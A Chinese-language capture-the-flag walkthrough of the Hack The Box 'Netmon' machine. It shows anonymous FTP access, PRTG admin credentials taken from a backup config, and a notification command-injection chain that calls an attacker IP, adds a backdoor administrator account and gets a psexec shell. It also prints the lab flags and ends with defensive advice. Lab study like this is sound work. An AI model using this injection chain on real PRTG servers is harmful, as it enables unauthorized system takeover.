[Meachines] [Easy] Netmon FTP匿名登录+PRTG 网络监控RCE权限提升
字数 1051 2025-08-20 18:18:11
PRTG 网络监控系统漏洞利用与权限提升教学文档
1. 信息收集阶段
1.1 初始扫描
使用Nmap进行端口扫描:
nmap -p- 10.10.10.152 --min-rate 1000 -sC -sV
扫描结果:
- 21/tcp: FTP服务 (Microsoft ftpd)
- 允许匿名登录 (Anonymous FTP login allowed)
- 目录结构可见
- 135/tcp: Microsoft Windows RPC
- 139/tcp: NetBIOS会话服务
- 445/tcp: Microsoft-DS (文件共享)
- 5985/tcp: HTTP (Microsoft HTTPAPI httpd 2.0)
操作系统信息:
- Windows Server 2008 R2 - 2012
1.2 FTP匿名登录
连接FTP并获取初始用户凭证:
ftp 10.10.10.152
使用用户名: anonymous 密码为空
获取用户标志:
ftp> get Users/Public/user.txt
user.txt内容:aef9a99e68e9807ecc4ecf46fc49746b
2. 漏洞发现与利用
2.1 发现PRTG网络监控系统
在FTP目录中发现PRTG配置文件:
ftp> cd "ProgramData/Paessler/PRTG Network Monitor"
ftp> get "PRTG Configuration.old.bak"
查看配置文件发现管理员凭证:
username: prtgadmin
password: PrTg@dmin2018
2.2 访问PRTG Web界面
访问Web界面:
http://10.10.10.152/index.htm
尝试使用发现的凭证登录:
- 用户名:
prtgadmin - 密码:
PrTg@dmin2018或PrTg@dmin2019(根据日期推断)
3. 权限提升
3.1 利用PRTG通知功能RCE
- 登录后进入
Setup > Account Settings > Notifications - 添加新通知
- 在通知命令中注入恶意命令:
;curl http://10.10.16.17/rce
完整利用链:
;curl http://10.10.16.17/Run;net user maptnh P0wned /add;curl http://10.10.16.17/UserAdd;net localgroup administrators maptnh /add;curl http://10.10.16.17/Done
3.2 获取系统权限
使用新创建的账户通过psexec获取系统权限:
impacket-psexec 'maptnh:P0wned@10.10.10.152'
获取root标志:
Root.txt fbaa6dc557503e828c1675b86665888f
4. 关键点总结
- FTP匿名登录:检查FTP服务是否允许匿名访问,这是常见的信息泄露途径
- 配置文件泄露:在FTP目录中查找可能包含凭证的配置文件
- 凭证复用:发现的凭证可能在Web应用或其他服务中复用
- PRTG RCE漏洞:通过通知功能注入命令实现远程代码执行
- 权限提升:通过添加新用户并将其加入管理员组实现权限提升
5. 防御建议
- 禁用FTP匿名访问
- 配置文件不应包含明文密码
- 实施最小权限原则
- 对用户输入进行严格过滤,防止命令注入
- 定期更新和修补监控系统
6. 扩展思考
- 此漏洞利用链展示了从信息收集到权限提升的完整过程
- 类似的技术可以应用于其他网络监控系统
- 命令注入漏洞是Web应用安全中的常见问题
- 横向移动技术在企业网络渗透测试中的重要性